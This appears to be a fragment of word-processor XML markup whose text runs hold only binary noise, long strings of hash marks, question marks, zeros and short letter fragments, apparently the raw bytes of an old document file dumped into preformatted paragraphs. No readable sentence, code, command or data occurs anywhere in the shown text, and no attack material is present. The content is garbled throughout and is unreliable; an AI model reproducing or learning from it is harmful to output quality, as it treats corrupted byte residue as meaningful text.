        <w:t>###########?vU_ #4########$##?v#^?v#a$###CJ##6#######6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #5########$##?H#^?H#a$###CJ##6#######6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #6########$##?##^?##a$###CJ##6#######6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #7########$##??#^??#a$###CJ##6#######6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #8########$##??#^??#a$###CJ##6#######6#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###########?vU_ #9########$##??#^??#a$###CJ##H#R@##?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?e?e,g)? #2########??##dD####?x#G$#H$#`??###CJ##4#?O##?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R?Q?k=?#######??#WD?#`??###aJ##6#?O##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B?######R?Q?k=?1########??#WD?#`??###aJ##0#^@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\######nf#?(#Q?z)##### ###CJ##aJ##f#?@?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!######Q&lt;h?W##7#:V!##?0###?#######?#######?#######?#######?#######?#######!##$#1$#a$####################################(###/###4###9###@###G###L###Q###?G##????######????##################????1#################????/#################????'#################????&amp;#################????$#################????##################????%#################????6#################????##################????##################????8#################????:#################???? #################????4#############################################################(###/###4###9###@###G###L###Q###T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??########?&gt;##?@##?@##?@##?G#####?####????##8?####????##??####????##??####????###?####????############################################################ ###!###&amp;###-###.###3###A###B###I###\###]###d###r###s###z###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###g###o###?###?###?###########&amp;###=###&gt;###F###?###?###?###########/###z###?###?###?#######"###(###Z###?###?###?###?###?###?###?###?###E###?###?###?###?###?####</w:t>
        <w:tab/>
        <w:t>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!</w:t>
        <w:tab/>
        <w:t>##'</w:t>
        <w:tab/>
        <w:t>##-</w:t>
        <w:tab/>
        <w:t>##4</w:t>
        <w:tab/>
        <w:t>##5</w:t>
        <w:tab/>
        <w:t>##8</w:t>
        <w:tab/>
        <w:t>##?</w:t>
        <w:tab/>
        <w:t>##D</w:t>
        <w:tab/>
        <w:t>##J</w:t>
        <w:tab/>
        <w:t>##P</w:t>
        <w:tab/>
        <w:t>##V</w:t>
        <w:tab/>
        <w:t>##W</w:t>
        <w:tab/>
        <w:t>##Z</w:t>
        <w:tab/>
        <w:t>##a</w:t>
        <w:tab/>
        <w:t>##f</w:t>
        <w:tab/>
        <w:t>##l</w:t>
        <w:tab/>
        <w:t>##r</w:t>
        <w:tab/>
        <w:t>##y</w:t>
        <w:tab/>
        <w:t>##z</w:t>
        <w:tab/>
        <w:t>##~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br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##?</w:t>
        <w:br/>
        <w:t>##&amp;###R###~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####?###?#######################################+###,###.###0###2###4###@###G###J###L###O###R###S###U###^###_###`###?###?###?###?###C###^###h###i###q###x###|###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###############################%###3###4###B###C###P###Q###R###X###f###g###u###v###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?####################### ###$###(###)###,###3###9###?###E###L###M###P###W###\###b###h###n###o###r###y###~###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?###?#######;###O###P###p###?###%###?###?###?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&amp;###,###/###;###G###H###J###Q###U###a###m###n###p###w###{###?###?###?###?###?###?###?#######?###?###?#######7###@###?###?###?###"###@###I###?###?###?###+###J###S###?###?###?###########-###&gt;###O###b###c###l###t###?###?###?###?###?###?###?###</w:t>
        <w:tab/>
        <w:t>#######,###@###I###J###N###O###P###[######?###?###?###?#######0###M###j###k###q###?###?###?###?###?###?###?###E###g###?#######?###? ##? ##5!##7!##8!##D!##X!##?!##?!##?!##S"##?"##?"######B####$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$##?$###%###%##</w:t>
        <w:br/>
        <w:t>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%###%###%###%###%###%###%###%###%##t%##?%###&amp;##?&amp;##?&amp;##?&amp;###'##W'##?'##?'##</w:t>
        <w:tab/>
        <w:t>(##O(##P(##w(##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>)###)###)##,)##3)##7)##;)##?)##C)##G)##H)##M)##Q)##U)##Y)##])##b)##c)##i)##l)##o)##r)##u)##x)##y)##?)##?*##h+##?+##?+##?+## ,##',##+,##/,##3,##7,##;,##&lt;,##A,##G,##M,##S,##Y,##_,##`,##f,##g,##k,##o,##s,##w,##x,##y,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,##?,###-###-###-##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-###-###-###-###-###-##!-##$-##.-##/-##8-##9-##K-##o-##v-##z-##~-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-##?-###.##_.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.##?.###/###/###/###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/###/###/###/###/###/###/##"/###/##)/##-/##./##2/##3/##?/##?/##?/###0##N0##|0##}0##?0##?0##?0##'1##i1##?1##|2##&gt;3##,4##F5##{6##?6##?6###7###7##?7##?7##?8##D8##?8##?8##D9##E9##P9##Y9##4:##5:##k:##?:##?:##?:###;###;##:;##;;##l;###&lt;##9&lt;##h&lt;##?&lt;##O=##i=##?=##?=##?=##?=##?=##%&gt;##Y&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;##?&gt;###?###?##</w:t>
        <w:br/>
        <w:t>?###?###?###?###?##"?##(?##,?##-?##.?##4?##9?##:?##;?##&lt;?##=?##&gt;?##??##@?##A?##B?##C?##P?##S?##U?##W?##Y?##[?##]?##_?##`?##b?##c?##d?##m?##p?##r?##t?##v?##x?##z?##|?##}?##?##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??##??###@###@###@###@###@##</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>@###@###@###@###@###@###@###@###@###@## @##!@##&amp;@##*@##1@##3@##5@##7@##9@##;@##&lt;@##&gt;@##?@##@@##E@##I@##K@##M@##O@##Q@##S@##U@##V@##X@##Y@##Z@##[@##\@##]@##_@##a@##c@##d@##f@##g@##i@##j@##k@##p@##t@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@##?@###A###A###A##IA##UA##VA##zA##{A##?A##?A##?A##?A###B###B##3B##4B##6B##BB##WB##dB##?C##?C##?D##?D##_E##fE##ZF##hF##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##?F##"G###G##.G##/G##0G##AG##BG##CG##DG##EG##FG##JG##KG##OG##PG##TG##UG##YG##ZG##_G##`G##gG##hG##lG##mG##sG##tG##xG##yG##}G##~G##?G##?G##?G##?G##?G##?G##?G##?G##?G##?####0#######?###?##########?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?#########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?####?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?###?####?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?##########?####0#######?###?##########?####0#######?###?########?#?####0#######?###?########?#?####0#######?###?##########?## #0#######?###?##########?## #0#######?###?##########?####0#######?###?########?#?####0#######?###?########?#?## #0#######?###?##########?####0#######?###?##########?#</w:t>
        <w:br/>
        <w:t xml:space="preserve"> #0#######?###?##########?############?###?########?#?############?###?########?#?############?###?########?#?#</w:t>
        <w:br/>
        <w:t xml:space="preserve"> #0#######?###?##########?####0#######?###?##########?####0#######?###?##########?############?###?##########?############?###?##########?############?###?########?#?####0#######?###?##########?############?###?###?####?#?####0#######?###?##########?####0#######?###?##########?####0#######?###?##########?####0#######?###?##########?####0#######?###?##########?## #0#######?###?##########?############?###?########?#?############?###?##########?## #0#######?###?##########?####0#######?###?##########?## #0#######?###?##########?############?###?########?#?############?###?###?######?############?###?##########?####0#######?###?##########?############?###?##########?############?###?##########?## #0#######?###?##########?####0#######?###?##########?####0#######?###?###?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########?###?##########?####0#######?###?##########?############?###?###############0#######?###?##########?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>############?####0#######??</w:t>
        <w:br/>
        <w:t>#################0#######?###?#########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##?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?############?=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>############?#####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##?#####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#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#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#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#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#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#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#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#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#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#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#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#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#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?#####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?#### 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#######0#######?###?##########?####0#######??###########?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?#### #?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?#</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?#</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??###########?######0#######?###?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??#############?####0#######??#############?####0#######??#############?####0#######??###########?#?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??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??#############?####0#######??#############?####0#######??###########?#?####0#######??###########?#?####0#######??#############?####0#######??###########?#?####0#######??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??#############?############??###########?#?############??###########?#?############??#############?############??###########?#?############??#############?############??#############?####0#######??###########?#?####0#######??###########?#?####0#######??###########?#?####0#######??########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??###########?#?############??#############?############??#############?############??#############?####0#######??###########?#?####0#######??###########?#?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??###########?#?####0#######??#############?####0#######??#############?####0#######??###########?#?####0#######??#############?####0#######??#############?####0#######??###########?#?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??#############?####0#######??###########?#?####0#######??#############?####0#######??###########?#?####0#######??###########?######0#######?###?##########?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?############?8!############?############?8!############?############?8!############?############?8!############?####0#######?8!############?############?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?############?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!############?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### #?####0#######?8!#####?#### ######0#######?###?##########?####0#######?y)############?####0#######?y)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?y)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?y)############?####0#######?y)############?####0#######?y)############?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)############?####0#######?y)############?####0#######?y)############?####0#######?y)############?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?######?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?######?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?######?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?######?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?######?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?######?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)############?####0#######?y)############?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)#####?#### #?####0#######?y)############?####0#######?y)############?####0#######?y)#################0#######?###?##########?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?############??-############?####0#######??-#####?######?####0#######??-#####?######?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?####0#######??-#####?#### #?############??-############?############??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?####0#######??-############?############??-############?############??-############?############??-############?############??-#####?######?############??-############?############??-############?####0#######??-############?####0#######??-############?## #0#######??-############?############??-#####8######?## #0#######??-############?############??-#####8######?## #0#######??-############?############??-#####8######?############??-############?####0#######??-############?####0#######??-#################0#######?###?##########?####0#######?E9############?############?E9############?####0#######?E9############?####0#######?E9##########?#?####0#######?E9############?####0#######?E9#################0#######?###?##########?####0#######??:##########?#?####0#######??:############?####0#######??:############?####0#######??:############?####0#######??:############?############??:############?####0#######??:############?####0#######??:##########?#?####0#######??:############?############??:############?####0#######??:##########?#?####0#######??:############?############??:############?####0#######??:##########?#?####0#######??:##########?#?####0#######??:##########?#?####0#######??:##########?#?####0#######??:############?####0#######??:############?####0#######??:#################0#######?###?##########?####0#######??&gt;##########?#?####0#######??&gt;############?####0#######??&gt;############?####0#######??&gt;#####?#### #?############??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?######?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0</w:t>
        <w:tab/>
        <w:t>######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0</w:t>
        <w:br/>
        <w:t>######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?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?## 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?&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?## #0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>######??&gt;#####?#### #?####0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?## #0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?####0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;#####?#### #?@###0#######??&gt;########## #?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?#?####0#######??&gt;##########?######0#######?###?##########?####0#######?#B############?####0#######?#B############?####0#######?#B#################0#######?###?##########?####0#######?6B############?####0#######?6B##########?#?############?6B#####@######(## #0#######?6B############?############??C##########?#(## #0#######?6B############?############??D##########?#(## 